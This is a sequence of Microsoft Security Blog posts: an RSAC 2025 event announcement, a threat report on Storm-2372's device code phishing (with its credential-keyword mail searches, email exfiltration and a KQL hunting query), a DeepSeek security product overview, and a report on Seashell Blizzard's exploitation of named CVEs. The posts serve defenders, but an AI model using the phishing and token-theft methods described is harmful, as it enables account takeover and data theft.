Microsoft will be hosting a number of events tailored to CISOs throughout RSAC 2025. To kick off the week, Microsoft will be hosting a Pre-Day, followed by the exclusive CISO dinner on April 27, 2025. Following, there will be daily lunch and learn opportunities that address some of the primary challenges facing CISOs organizations:

Monday April 28, 2025: Innovating Securely CISO Lunch—Learn insights concerning secure innovation centered around the new AI regulations, including the EU Act, Digital Operational Resilience Act (DORA), and more.
Tuesday April 29, 2025: SFI Executive Lunch—Open to all and focused around the needs of Latin America-based CISOs, this lunch will bring together leaders and experts interested in understanding the latest Secure Future Initiative (SFI) progress and exchanging their thoughts on related best practices.
Wednesday April 30, 2025: Embracing Cyber resilience CISO Lunch—Attendees are invited to network, learn, and exchange their insights regarding cyber resilience as the AI landscape evolves.

Finally, CISOs who attend RSAC 2025 are invited to stay through the end of the conference to attend the Microsoft Post-Day Forum at the Microsoft Experience Center at Silicon Valley on Thursday, May 1, 2025, from 9:00 AM PT to 1:00 PM PT. The day will be full of insightful presentations, interactive discussions, networking opportunities, and a curated CISO roundtable session. This informative day will also include an immersive tour of the unique state-of-the-art Microsoft Experience Center, which highlights larger-than-life solutions that show Microsoft’s cutting-edge technology solving many of today’s challenges. This experience is facilitated by envisioning specialists who spark inspired conversations, creative ideas, and new opportunities for leaders to participate in before returning home.

Sign up for Microsoft experiences at RSAC, including the Pre-Day, the CISO dinner, CISO lunch, and the Post-Day Forum. Request a one-on-one meeting with Microsoft experts to discuss your most pressing questions here.

Discover solutions to your challenges during the keynote speech and Microsoft sessions

As part of the RSAC agenda, Vasu Jakkal will take the stage on Monday, April 28, 2025, at 4:40 PM PT. During the speech, she will discuss the potential of agentic workflows to dramatically reshape the security landscape. Agentic AI has the power to enable more complex problem-solving, deeper agent collaboration, and iterative learning. All of this leads us toward a previously unheard-of new paradigm for security. Join Vasu Jakkal for an imaginative look at the future of AI security agents and how the people of our security teams will work alongside them to change the game.

After the keynote and throughout the conference, attendees will be able to split their time between the Microsoft Security sessions included in the RSAC 2025 agenda, live demonstrations at booth #5744 in Moscone North, and a variety of roundtables, one-on-one meetings, and presentations at the Microsoft Security Hub at the Palace Hotel.

Here are two sessions not to miss:

Tuesday, April 29, 2025, at 9:40 AM PT: Shaping the Future of Security with Agentic AI—In a time of rapidly evolving cyberthreats, agentic AI is emerging as a transformative force in security. Join Dorothy Li, Corporate Vice President of Microsoft Security Copilot and Marketplace, to discover how autonomous decision-making is reshaping our approach to cybersecurity. This session will reveal how agentic AI empowers organizations to proactively mitigate risks, enhance operational efficiency, and elevate the effectiveness of your security tools. Attendees will gain actionable insights and practical strategies for harnessing the potential of agentic AI. Prepare to rethink the future of security and position your organization at the forefront of innovation.
Wednesday, April 30, 2025, at 9:40 AM PT: Accelerate AI Adoption with Stronger Security—AI adoption is accelerating, creating both new opportunities and security challenges. Led by Neta Haiby, Partner Product Manager at Microsoft, this session covers key AI adoption trends, emerging risks, and common cyberthreats. Discover actionable steps to secure and govern AI, from establishing a dedicated security team for AI to adopting AI-specific solutions, ensuring your organization can innovate with confidence.

Other well-known Microsoft experts will host session sharing what they’ve learned from their work pioneering and securing AI:

Wednesday, April 30, 2025 at 8:30 AM PT: Guardians of the Cyber Galaxy: Allies Against AI-Powered Cybercrime by Sean Farrell, Assistant General Counsel, Digital Crimes Unit.
Monday, April 28, 2025 at 1:10 PM PT: AI Era Authentication: Securing the Future with Inclusive Identity by Abhilasha Bhargav-Spantzel, Partner Security Architect, and Aditi Shah, Senior Data and Applied Scientist.
Tuesday, April 29, 2025, at 8:30 AM PT: AI Safety: Where Do We Go From Here? by Ram Shankar Siva Kumar, Principal Research Lead, AI Red Team Lead.
Tuesday, April 29, 2025, at 2:25 PM PT: Lessons Learned from a Year(ish) of Countering Malicious Actors’ Use of AI by Sherrod DeGrippo, Director, Threat intelligence strategy.

View live demonstrations and discover engaging ways to learn at booth #5744

At the Microsoft booth, attendees will have the chance to engage with experts, discover ready-to-go security and governance tools built for generative AI, and watch theater sessions showcasing the latest products, innovations, and industry perspectives from Microsoft. They’ll also get to enjoy a fun and interactive gaming experience.

Microsoft product and partner experts will be on hand to showcase the newest advancements through captivating demonstrations, informative videos, and valuable resources.

Visit the Microsoft booth theater for exclusive 20-minute demos and expert-led sessions on the latest in security and AI. Explore strategies to protect, govern, and secure AI. Listen in to insights on identity, compliance, privacy, threat defense, data protection, and more. Don’t miss this opportunity to learn from industry leaders and stay ahead in the ever-evolving security landscape.

Meetings and connections at the Microsoft Security Hub

The historic and luxurious Palace Hotel is home base for Microsoft during the week. RSAC 2025 attendees are invited to meet with Microsoft experts and executives, attend thought leadership sessions and roundtable lunches, and join networking opportunities. Detailed information about individual sessions can be found on the Microsoft Security Experiences at RSAC 2025 Landing Page.

Customers are also invited to deepen their understanding of the latest cybersecurity threats, trends, and developments by discussing their most important security product and threat intelligence questions directly with Microsoft security experts through scheduled one-on-one meetings, held from Monday, April 28, 2025, to Wednesday, April 30, 2025, at the Palace Hotel. Request your meeting directly through the Microsoft Security Experiences at RSAC 2025 Home Page.

Microsoft Intelligent Security Association featured partners

The Microsoft Intelligent Security Association (MISA) will once again have a considerable presence at RSAC 2025. MISA partners will be featured in the Microsoft Booth #5744 and included in other events happening throughout the week. Additionally, the sixth annual Microsoft Security Excellence Awards, presented by MISA, will be held at the Palace Hotel in San Francisco on April 28, 2025, celebrating our finalists and announcing winners in nine award categories as well as enjoying a time of connecting.

Activities include:

MISA demo station: Stop by the Microsoft Booth to explore the innovative solutions developed by MISA members, which integrate Microsoft Security technology.
Theater sessions: Attend one or more of our five theater sessions at the Microsoft booth, led by MISA members, focusing on partner strategies and solutions for cyberthreat protection.
View the MISA demo and theater schedule.
MISA Partner awards: MISA members are invited to attend the Microsoft Security Excellence Awards on Monday, April 28, 2025, where winners will be announced in nine security award categories.

Get the most by staying through Microsoft Post-Day

Microsoft Post-Day Forum is a unique experience designed to help customers, CISOs, and security leaders dive deep into new concepts, ask questions they need answered about product features, and prepare to realize and enable the AI-first, end-to-end security concepts they’ve learned about throughout RSAC 2025. The Microsoft Post-Day Forum, hosted by Microsoft Security executives, will be held on Thursday, May 1, 2025, from 10:00 AM PT to 1:00 PM PT, at the Silicon Valley Experience Center. Pick up for the event will be held at the Palace Hotel at 8:00 AM PT, with drop off organized for 2:00 PM PT.

We look forward to seeing you at RSAC 2025!

Learn more about the Microsoft experience at RSAC 2025

Customers and partners can register for the events highlighted in this blog as well as other Microsoft ancillary events and more here.

Explore Microsoft Security events at RSAC 2025

The post Join us for the end-to-end Microsoft RSAC 2025 Conference experience appeared first on Microsoft Security Blog.

Categories: Microsoft

Storm-2372 conducts device code phishing campaign

Microsoft Malware Protection Center - Thu, 02/13/2025 - 8:00pm

Executive summary

Today we’re sharing that Microsoft discovered cyberattacks being launched by a group we call Storm-2372, who we assess with medium confidence aligns with Russia’s interests and tradecraft. The attacks appear to have been ongoing since August 2024 and have targeted governments, NGOs, and a wide range of industries in multiple regions. The attacks use a specific phishing technique called “device code phishing” that tricks users to log into productivity apps while Storm-2372 actors capture the information from the log in (tokens) that they can use to then access compromised accounts. These tokens are part of an industry standard and, while these phishing lures used Microsoft and other apps to trick users, they do not reflect a vulnerability unique to Microsoft nor have we found any vulnerabilities in our code base enabling this activity.

Microsoft Threat Intelligence Center discovered an active and successful device code phishing campaign by a threat actor we track as Storm-2372. Our ongoing investigation indicates that this campaign has been active since August 2024 with the actor creating lures that resemble messaging app experiences including WhatsApp, Signal, and Microsoft Teams. Storm-2372’s targets during this time have included government, non-governmental organizations (NGOs), information technology (IT) services and technology, defense, telecommunications, health, higher education, and energy/oil and gas in Europe, North America, Africa, and the Middle East. Microsoft assesses with medium confidence that Storm-2372 aligns with Russian interests, victimology, and tradecraft.

In device code phishing, threat actors exploit the device code authentication flow to capture authentication tokens, which they then use to access target accounts, and further gain access to data and other services that the compromised account has access to. This technique could enable persistent access as long as the tokens remain valid, making this attack technique attractive to threat actors.

The phishing attack identified in this blog masquerades as Microsoft Teams meeting invitations delivered through email. When targets click the meeting invitation, they are prompted to authenticate using a threat actor-generated device code. The actor then receives the valid access token from the user interaction, stealing the authenticated session.

Because of the active threat represented by Storm-2372 and other threat actors exploiting device code phishing techniques, we are sharing our latest research, detections, and mitigation guidance on this campaign to raise awareness of the observed tactics, techniques, and procedures (TTPs), educate organizations on how to harden their attack surfaces, and disrupt future operations by this threat actor. Microsoft uses Storm designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we reach high confidence about the origin or identity of the threat actor behind the activity.

Microsoft Threat Intelligence Center continues to track campaigns launched by Storm-2372, and, when able, directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. Microsoft is also tracking other groups using similar techniques, including those documented by Volexity in their recent publication.

How does device code phishing work?

A device code authentication flow is a numeric or alphanumeric code used to authenticate an account from an input-constrained device that does not have the ability to perform an interactive authentication using a web flow and thus must perform this authentication on another device to sign-in. In device code phishing, threat actors exploit the device code authentication flow.

During the attack, the threat actor generates a legitimate device code request and tricks the target into entering it into a legitimate sign-in page. This grants the actor access and enables them to capture the authentication—access and refresh—tokens that are generated, then use those tokens to access the target’s accounts and data. The actor can also use these phished authentication tokens to gain access to other services where the user has permissions, such as email or cloud storage, without needing a password. The threat actor continues to have access so long as the tokens remain valid. The attacker can then use the valid access token to move laterally within the environment.

Figure 1. Device code phishing attack cycle Storm-2372 phishing lure and access

Storm-2372’s device code phishing campaign has been active since August 2024. Observed early activity indicates that Storm-2372 likely targeted potential victims using third-party messaging services including WhatsApp, Signal, and Microsoft Teams, falsely posing as a prominent person relevant to the target to develop rapport before sending subsequent invitations to online events or meetings via phishing emails.

Figure 2. Sample messages from the threat actor posing as a prominent person and building rapport on Signal

The invitations lure the user into completing a device code authentication request emulating the experience of the messaging service, which provides Storm-2372 initial access to victim accounts and enables Graph API data collection activities, such as email harvesting.

Figure 3. Example of lure used in phishing campaign

On the device code authentication page, the user is tricked into entering the code that the threat actor included as the ID for the fake Teams meeting invitation.

Post-compromise activity

Once the victim uses the device code to authenticate, the threat actor receives the valid access token. The threat actor then uses this valid session to move laterally within the newly compromised network by sending additional phishing messages containing links for device code authentication to other users through intra-organizational emails originating from the victim’s account.

Figure 4. Legitimate device code authentication page

Additionally, Microsoft observed Storm-2372 using Microsoft Graph to search through messages of the account they’ve compromised. The threat actor was using keyword searching to view messages containing words such as username, password, admin, teamviewer, anydesk, credentials, secret, ministry, and gov. Microsoft then observed email exfiltration via Microsoft Graph of the emails found from these searches.

Attribution

The actor that Microsoft tracks as Storm-2372 is a suspected nation-state actor working toward Russian state interests. It notably has used device code phishing to compromise targets of interest. Storm-2372 likely initially approaches targets through third-party messaging services, posing as a prominent individual relevant to the target to develop rapport before sending invites to online events or meetings. These invites lure the user into device code authentication that grants initial access to Storm-2372 and enables Graph API data collection activities such as email harvesting.

Storm-2372 targets include government, NGOs, IT services and technology, defense, telecommunications, health, higher education, and energy/oil and gas in Europe, North America, Africa, and the Middle East.

Mitigation and protection guidance

To harden networks against the Storm-2372 activity described above, defenders can implement the following:

Only allow device code flow where necessary. Microsoft recommends blocking device code flow wherever possible. Where necessary, configure Microsoft Entra ID’s device code flow in your Conditional Access policies.
Educate users about common phishing techniques. Sign-in prompts should clearly identify the application being authenticated to. As of 2021, Microsoft Azure interactions prompt the user to confirm (“Cancel” or “Continue”) that they are signing in to the app they expect, which is an option frequently missing from phishing sign-ins.
If suspected Storm-2372 or other device code phishing activity is identified, revoke the user’s refresh tokens by calling revokeSignInSessions. Consider setting a Conditional Access Policy to force re-authentication for users.
Implement a sign-in risk policy to automate response to risky sign-ins. A sign-in risk represents the probability that a given authentication request isn’t authorized by the identity owner. A sign-in risk-based policy can be implemented by adding a sign-in risk condition to Conditional Access policies that evaluates the risk level of a specific user or group. Based on the risk level (high/medium/low), a policy can be configured to block access or force multi-factor authentication.
- When a user is a high risk and Conditional access evaluation is enabled, the user’s access is revoked, and they are forced to re-authenticate.
- For regular activity monitoring, use Risky sign-in reports, which surface attempted and successful user access activities where the legitimate owner might not have performed the sign-in.
Require multifactor authentication (MFA). While certain attacks such as device code phishing attempt to evade MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
- Leverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft Authenticator with passkey. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.
- Block legacy authentication with Microsoft Entra by using Conditional Access. Legacy authentication protocols do not have the ability to enforce MFA, as legacy MFA (per-user MFA prompts) is susceptible to abuse.
Centralize your organization’s identity management into a single platform. If your organization is a hybrid environment, integrate your on-premises directories with your cloud directories. If your organization is using a third-party for identity management, ensure this data is being logged in a SIEM or connected to Microsoft Entra to fully monitor for malicious identity access from a centralized location. The added benefits to centralizing all identity data is to facilitate implementation of Single Sign On (SSO) and provide users with a more seamless authentication process, as well as configure Entra ID’s machine learning models to operate on all identity data, thus learning the difference between legitimate access and malicious access quicker and easier. It is recommended to synchronize all user accounts except administrative and high privileged ones when doing this to maintain a boundary between the on-premises environment and the cloud environment, in case of a breach.
Secure accounts with credential hygiene: practice the principle of least privilege and audit privileged account activity in your Entra ID environments to slow and stop attackers.

Microsoft Defender XDR detections

Microsoft Defender for Office 365

Microsoft Defender for Office 365 detects malicious activity associated with this threat through the following alerts:

This email has traits consistent with phishing
This HTML has traits consistent with phishing

Microsoft Entra ID Protection

The following Microsoft Entra ID Protection risk detections inform Entra ID user risk events and can indicate associated threat activity, including unusual user activity consistent with known attack patterns identified by Microsoft Threat Intelligence research:

Activity from Anonymous IP address (RiskEventType: anonymizedIPAddress)
Microsoft Entra threat intelligence (sign-in): (RiskEventType: investigationsThreatIntelligence)

Hunting queries Microsoft Defender XDR

The following query can help identify possible device code phishing attempts:

let suspiciousUserClicks = materialize(UrlClickEvents | where ActionType in ("ClickAllowed", "UrlScanInProgress", "UrlErrorPage") or IsClickedThrough != "0" | where UrlChain has_any ("microsoft.com/devicelogin", "login.microsoftonline.com/common/oauth2/deviceauth") | extend AccountUpn = tolower(AccountUpn) | project ClickTime = Timestamp, ActionType, UrlChain, NetworkMessageId, Url, AccountUpn); //Check for Risky Sign-In in the short time window let interestedUsersUpn = suspiciousUserClicks | where isnotempty(AccountUpn) | distinct AccountUpn; let suspiciousSignIns = materialize(AADSignInEventsBeta | where ErrorCode == 0 | where AccountUpn in~ (interestedUsersUpn) | where RiskLevelDuringSignIn in (10, 50, 100) | extend AccountUpn = tolower(AccountUpn) | join kind=inner suspiciousUserClicks on AccountUpn | where (Timestamp - ClickTime) between (-2min .. 7min) | project Timestamp, ReportId, ClickTime, AccountUpn, RiskLevelDuringSignIn, SessionId, IPAddress, Url ); //Validate errorCode 50199 followed by success in 5 minute time interval for the interested user, which suggests a pause for the code which the user provided from the phishing email let interestedSessionUsers = suspiciousSignIns | where isnotempty(AccountUpn) | distinct AccountUpn; let shortIntervalSignInAttemptUsers = materialize(AADSignInEventsBeta | where AccountUpn in~ (interestedSessionUsers) | where ErrorCode in (0, 50199) | summarize ErrorCodes = make_set(ErrorCode) by AccountUpn, CorrelationId, SessionId | where ErrorCodes has_all (0, 50199) | distinct AccountUpn); suspiciousSignIns | where AccountUpn in (shortIntervalSignInAttemptUsers) Microsoft Sentinel

Microsoft Sentinel customers can use the following queries to detect phishing attempts and email exfiltration attempts via Graph API. While these queries are not specific to threat actors, they can help you stay vigilant and safeguard your organization from phishing attacks:

References

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog: https://aka.ms/threatintelblog.

The post Storm-2372 conducts device code phishing campaign appeared first on Microsoft Security Blog.

Categories: Microsoft

Securing DeepSeek and other AI systems with Microsoft Security

Microsoft Malware Protection Center - Thu, 02/13/2025 - 12:00pm

A successful AI transformation starts with a strong security foundation. With a rapid increase in AI development and adoption, organizations need visibility into their emerging AI apps and tools. Microsoft Security provides threat protection, posture management, data security, compliance, and governance to secure AI applications that you build and use. These capabilities can also be used to help enterprises secure and govern AI apps built with the DeepSeek R1 model and gain visibility and control over the use of the seperate DeepSeek consumer app.

Secure and govern AI apps built with the DeepSeek R1 model on Azure AI Foundry and GitHub Develop with trustworthy AI

Last week, we announced DeepSeek R1’s availability on Azure AI Foundry and GitHub, joining a diverse portfolio of more than 1,800 models.

Customers today are building production-ready AI applications with Azure AI Foundry, while accounting for their varying security, safety, and privacy requirements. Similar to other models provided in Azure AI Foundry, DeepSeek R1 has undergone rigorous red teaming and safety evaluations, including automated assessments of model behavior and extensive security reviews to mitigate potential risks. Microsoft’s hosting safeguards for AI models are designed to keep customer data within Azure’s secure boundaries.

azure AI content Safety

Learn more

With Azure AI Content Safety, built-in content filtering is available by default to help detect and block malicious, harmful, or ungrounded content, with opt-out options for flexibility. Additionally, the safety evaluation system allows customers to efficiently test their applications before deployment. These safeguards help Azure AI Foundry provide a secure, compliant, and responsible environment for enterprises to confidently build and deploy AI solutions. See Azure AI Foundry and GitHub for more details.

Build transformative AI apps with Azure AI Foundry Start with Security Posture Management

Microsoft Defender for Cloud

Learn more

AI workloads introduce new cyberattack surfaces and vulnerabilities, especially when developers leverage open-source resources. Therefore, it’s critical to start with security posture management, to discover all AI inventories, such as models, orchestrators, grounding data sources, and the direct and indirect risks around these components. When developers build AI workloads with DeepSeek R1 or other AI models, Microsoft Defender for Cloud’s AI security posture management capabilities can help security teams gain visibility into AI workloads, discover AI cyberattack surfaces and vulnerabilities, detect cyberattack paths that can be exploited by bad actors, and get recommendations to proactively strengthen their security posture against cyberthreats.

Figure 1. AI security posture management in Defender for Cloud detects an attack path to a DeepSeek R1 workload.

By mapping out AI workloads and synthesizing security insights such as identity risks, sensitive data, and internet exposure, Defender for Cloud continuously surfaces contextualized security issues and suggests risk-based security recommendations tailored to prioritize critical gaps across your AI workloads. Relevant security recommendations also appear within the Azure AI resource itself in the Azure portal. This provides developers or workload owners with direct access to recommendations and helps them remediate cyberthreats faster.

Safeguard DeepSeek R1 AI workloads with cyberthreat protection

While having a strong security posture reduces the risk of cyberattacks, the complex and dynamic nature of AI requires active monitoring in runtime as well. No AI model is exempt from malicious activity and can be vulnerable to prompt injection cyberattacks and other cyberthreats. Monitoring the latest models is critical to ensuring your AI applications are protected.

Integrated with Azure AI Foundry, Defender for Cloud continuously monitors your DeepSeek AI applications for unusual and harmful activity, correlates findings, and enriches security alerts with supporting evidence. This provides your security operations center (SOC) analysts with alerts on active cyberthreats such as jailbreak cyberattacks, credential theft, and sensitive data leaks. For example, when a prompt injection cyberattack occurs, Azure AI Content Safety prompt shields can block it in real-time. The alert is then sent to Microsoft Defender for Cloud, where the incident is enriched with Microsoft Threat Intelligence, helping SOC analysts understand user behaviors with visibility into supporting evidence, such as IP address, model deployment details, and suspicious user prompts that triggered the alert.

Figure 2. Microsoft Defender for Cloud integrates with Azure AI to detect and respond to prompt injection cyberattacks.

Additionally, these alerts integrate with Microsoft Defender XDR, allowing security teams to centralize AI workload alerts into correlated incidents to understand the full scope of a cyberattack, including malicious activities related to their generative AI applications.

Figure 3. A security alert for a prompt injection attack is flagged in Defender for Cloud Secure and govern the use of the DeepSeek app

In addition to the DeepSeek R1 model, DeepSeek also provides a consumer app hosted on its local servers, where data collection and cybersecurity practices may not align with your organizational requirements, as is often the case with consumer-focused apps. This underscores the risks organizations face if employees and partners introduce unsanctioned AI apps leading to potential data leaks and policy violations. Microsoft Security provides capabilities to discover the use of third-party AI applications in your organization and provides controls for protecting and governing their use.

Secure and gain visibility into DeepSeek app usage

Microsoft Defender for Cloud Apps

Learn more

Microsoft Defender for Cloud Apps provides ready-to-use risk assessments for more than 850 Generative AI apps, and the list of apps is updated continuously as new ones become popular. This means that you can discover the use of these Generative AI apps in your organization, including the DeepSeek app, assess their security, compliance, and legal risks, and set up controls accordingly. For example, for high-risk AI apps, security teams can tag them as unsanctioned apps and block user’s access to the apps outright.

Figure 4. Discover usage and control access to Generative AI applications based on their risk factors in Defender for Cloud Apps. Comprehensive data security

Data security

Learn more

In addition, Microsoft Purview Data Security Posture Management (DSPM) for AI provides visibility into data security and compliance risks, such as sensitive data in user prompts and non-compliant usage, and recommends controls to mitigate the risks. For example, the reports in DSPM for AI can offer insights on the type of sensitive data being pasted to Generative AI consumer apps, including the DeepSeek consumer app, so data security teams can create and fine-tune their data security policies to protect that data and prevent data leaks.

Figure 5. Microsoft Purview Data Security Posture Management (DSPM) for AI enables security teams to gain visibility into data risks and get recommended actions to address them. Prevent sensitive data leaks and exfiltration

Microsoft Purview Data Loss Prevention

Learn more

The leakage of organizational data is among the top concerns for security leaders regarding AI usage, highlighting the importance for organizations to implement controls that prevent users from sharing sensitive information with external third-party AI applications.

Microsoft Purview Data Loss Prevention (DLP) enables you to prevent users from pasting sensitive data or uploading files containing sensitive content into Generative AI apps from supported browsers. Your DLP policy can also adapt to insider risk levels, applying stronger restrictions to users that are categorized as ‘elevated risk’ and less stringent restrictions for those categorized as ‘low-risk’. For example, elevated-risk users are restricted from pasting sensitive data into AI applications, while low-risk users can continue their productivity uninterrupted. By leveraging these capabilities, you can safeguard your sensitive data from potential risks from using external third-party AI applications. Security admins can then investigate these data security risks and perform insider risk investigations within Purview. These same data security risks are surfaced in Defender XDR for holistic investigations.

Figure 6. Data Loss Prevention policy can block sensitive data from being pasted to third-party AI applications in supported browsers.

This is a quick overview of some of the capabilities to help you secure and govern AI apps that you build on Azure AI Foundry and GitHub, as well as AI apps that users in your organization use. We hope you find this useful!

To learn more and to get started with securing your AI apps, take a look at the additional resources below:

Learn more with Microsoft Security

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

The post Securing DeepSeek and other AI systems with Microsoft Security appeared first on Microsoft Security Blog.

Categories: Microsoft

The BadPilot campaign: Seashell Blizzard subgroup conducts multiyear global access operation

Microsoft Malware Protection Center - Wed, 02/12/2025 - 12:00pm

Microsoft is publishing for the first time our research into a subgroup within the Russian state actor Seashell Blizzard and its multiyear initial access operation, tracked by Microsoft Threat Intelligence as the “BadPilot campaign”. This subgroup has conducted globally diverse compromises of Internet-facing infrastructure to enable Seashell Blizzard to persist on high-value targets and support tailored network operations. This blog details this subgroup’s recently observed tactics, techniques, and procedures (TTPs), and describes three of its distinct exploitation patterns. The geographical targeting to a near-global scale of this campaign expands Seashell Blizzard’s scope of operations beyond Eastern Europe. Additionally, the opportunistic access methods outlined in this campaign will continue to offer Russia opportunities for niche operations and activities.

Active since at least 2021, this subgroup within Seashell Blizzard has leveraged opportunistic access techniques and stealthy forms of persistence to collect credentials, achieve command execution, and support lateral movement that has at times led to substantial regional network compromises. Observed operations following initial access indicate that this campaign enabled Seashell Blizzard to obtain access to global targets across sensitive sectors including energy, oil and gas, telecommunications, shipping, arms manufacturing, in addition to international governments. We assess that this subgroup has been enabled by a horizontally scalable capability bolstered by published exploits that allowed Seashell Blizzard to discover and compromise numerous Internet-facing systems across a wide range of geographical regions and sectors. Since early 2024, the subgroup has expanded its range of access to include targets in the United States and United Kingdom by exploiting vulnerabilities primarily in ConnectWise ScreenConnect (CVE-2024-1709) IT remote management and monitoring software and Fortinet FortiClient EMS security software (CVE-2023-48788). These new access operations built upon previous efforts between 2021 and 2023 which predominantly affected Ukraine, Europe, and specific verticals in Central and South Asia, and the Middle East.

Microsoft Threat Intelligence assesses that while some of the subgroup’s targeting is opportunistic, its compromises cumulatively offer Seashell Blizzard options when responding to Russia’s evolving strategic objectives. Since April 2022, Russia-aligned threat actors have increasingly targeted international organizations that are either geopolitically significant or provide military and/or political support to Ukraine. In addition to establishing access to these targets outside Ukraine, we assess that the subgroup has likely enabled at least three destructive cyberattacks in Ukraine since 2023 (see below discussion of Seashell Blizzard for more information about their activities against Ukraine).

Seashell Blizzard’s far-reaching access operations pose a significant risk to organizations within the group’s strategic purview. Despite the commodity nature of this subgroup’s exploitation patterns, notable shifts within the actor’s post-compromise tradecraft are reflected within the subgroup’s activities, which may carry over to other aspects of Seashell Blizzard’s more traditional operations and carry more significant implications for auditing during incident response.

Microsoft Threat Intelligence tracks campaigns launched by Seashell Blizzard as well as this subgroup, and when able, directly notifies customers who have been targeted or compromised, providing them with the necessary information to help secure their environments. As part of our continuous monitoring, analysis, and reporting on the threat landscape, we are sharing our research on this campaign’s activity to raise awareness of the observed TTPs and to educate organizations on how to harden their attack surfaces against this and similar activity.

Who is Seashell Blizzard?

Seashell Blizzard is a high-impact threat actor linked to the Russian Federation that conducts global activities on behalf of Russian Military Intelligence Unit 74455 (GRU). Seashell Blizzard’s specialized operations have ranged from espionage to information operations and cyber-enabled disruptions, usually in the form of destructive attacks and manipulation of industrial control systems (ICS). Active since at least 2013, this threat actor’s prolific operations include destructive attacks such as KillDisk (2015) and FoxBlade (2022), supply-chain attacks (MeDoc, 2017), and pseudo-ransomware attacks such as NotPetya (2017) and Prestige (2022), in addition to numerous other specialized disruptive capabilities. Seashell Blizzard is assessed to be highly skilled at enabling broad and persistent access against priority computer networks, which sometimes gives the group significant tenure for future potential follow-on activity.

Due to their specialization in computer network exploitation (CNE) and expertise targeting critical infrastructure such as ICS and supervisory control and data acquisition systems (SCADA), Seashell Blizzard’s operations have frequently been leveraged during military conflicts and as an adaptable element during contentious geopolitical events. Historically, some of Seashell Blizzard’s operations may be considered part of a spectrum of retaliatory actions sometimes used by the Russian Federation. Since Russia’s invasion of Ukraine in 2022, Seashell Blizzard has conducted a steady stream of operations complementing Russian military objectives. The threat actor’s longstanding strategic targets in the region have included critical infrastructure such as energy and water, government, military, transportation and logistics, manufacturing, telecommunications, and other supportive civilian infrastructure.

Since at least April 2023, Seashell Blizzard has increased targeting of military communities in the region, likely for tactical intelligence gain. Their persistent targeting of Ukraine suggests Seashell Blizzard is tasked to obtain and retain access to high-priority targets to provide the Russian military and Russian government a range of options for future actions.

Seashell Blizzard’s network intrusions leverage diverse tradecraft and typically employ a range of common publicly available tools, including Cobalt Strike and DarkCrystalRAT. Network intrusions linked to the threat actor have affected multiple tiers of infrastructure, showcasing Seashell Blizzard’s abilities to target end users, network perimeters, and vertical-specific systems leveraging both publicly available and custom exploits and methods.

Since February 2022, Seashell Blizzard has generally taken three approaches to their network intrusions:

Targeted: Seashell Blizzard has frequently used tailored mechanisms to access targets, including scanning and exploitation of specific victim infrastructure, phishing, and modifying legitimate functionality of existing systems to either expand network access or obtain confidential information.
Opportunistic: Seashell Blizzard has increasingly used broad exploitation of Internet-facing infrastructure and distribution of malware implants spread through trojanized software to achieve scalable but indiscriminate access. In cases where a resulting victim is identified as strategically valuable, Microsoft Threat Intelligence has observed the threat actor conducting significant post-compromise activities.
Hybrid: Seashell Blizzard has very likely gained access to target organizations using a limited supply-chain attack narrowly focused within Ukraine, an operation that was recently mitigated by the Computer Emergency Response Team of Ukraine (CERT-UA). Other hybrid methods have included compromise of regional managed IT service providers, which often afforded regional or vertical-specific access to diverse targets.

Seashell Blizzard overlaps with activity tracked by other security vendors as BE2, UAC-0113, Blue Echidna, Sandworm, PHANTOM, BlackEnergy Lite, and APT44.

Attribution assessment

Microsoft Threat Intelligence assesses that the initial access subgroup is linked to Seashell Blizzard. Despite the subgroup’s opportunistic tactics, we are able to distinguish this subgroup due to its consistent use of distinct exploits, tooling, infrastructure, and late-stage methods used to establish persistence. Moreover, our longstanding forensic investigation uncovered distinct post-compromise activities, a part of which incorporated specific operational capabilities and resources chiefly utilized by Seashell Blizzard. We have also observed the initial access subgroup to pursue access to an organization prior to a Seashell Blizzard-linked destructive attack.

Scope of operations and targeting trends

Microsoft Threat Intelligence assesses that Seashell Blizzard uses this initial access subgroup to horizontally scale their operations as new exploits are acquired and to sustain persistent access to current and future sectors of interest to Russia. This subgroup conducts broad operations against a variety of sectors and geographical areas. In 2022, its primary focus was Ukraine, specifically targeting the energy, retail, education, consulting, and agriculture sectors. In 2023, it globalized the scope of its compromises, leading to persistent access within numerous sectors in the United States, Europe, Central Asia, and the Middle East. It frequently prioritized sectors that either provided material support to the war in Ukraine or were geopolitically significant. In 2024, while the exposure of multiple vulnerabilities likely offered the subgroup more access than ever, it appeared to have honed its focus to the United States, Canada, Australia, and the United Kingdom.

This subgroup’s historical pattern of exploitation has also led to the compromise of globally diverse organizations that appear to have limited or no utility to Russia’s strategic interests. This pattern suggests the subgroup likely uses an opportunistic “spray and pray” approach to achieving compromises at scale to increase the likelihood of acquiring access at targets of interest with limited tailored effort. In cases where a strategically significant target is compromised, we have observed significant later post-compromise activity. The geographic focus of the subgroup frequently transitions between broad campaigns against multiple geographic targets and a narrow focus on specific regions or countries, demonstrating the subgroup’s flexibility to pursue unique regional objectives.

Figure 1. The geographical spread of the initial access subgroup’s targets Initial access subgroup opportunistically compromises perimeter infrastructure using published CVEs

Since late 2021, Seashell Blizzard has used this initial access subgroup to conduct targeted operations by exploiting vulnerable Internet-facing infrastructure following discovery through direct scanning and, more uniquely, use of third-party internet scanning services and knowledge repositories. These exploitation efforts are followed by an operational lifecycle using a consistent set of TTPs to support persistence and lateral movement, which have incrementally evolved to become more evasive over time. Microsoft Threat Intelligence has identified at least three distinct exploitation patterns and operational behaviors linked to this subgroup, which are described in more detail below:

Figure 2. Seashell Blizzard initial access subgroup operational lifecycle

To date, at least eight vulnerabilities common within specific categories of server infrastructure typically found on network perimeters of small office/home office (SOHO) and enterprise networks have been exploited by this subgroup:

Microsoft Exchange (CVE-2021-34473)
- Zimbra Collaboration (CVE-2022-41352)
- OpenFire (CVE-2023-32315)
- JetBrains TeamCity (CVE-2023-42793)
- Microsoft Outlook (CVE-2023-23397)
- Connectwise ScreenConnect (CVE-2024-1709)
- Fortinet FortiClient EMS (CVE-2023-48788)
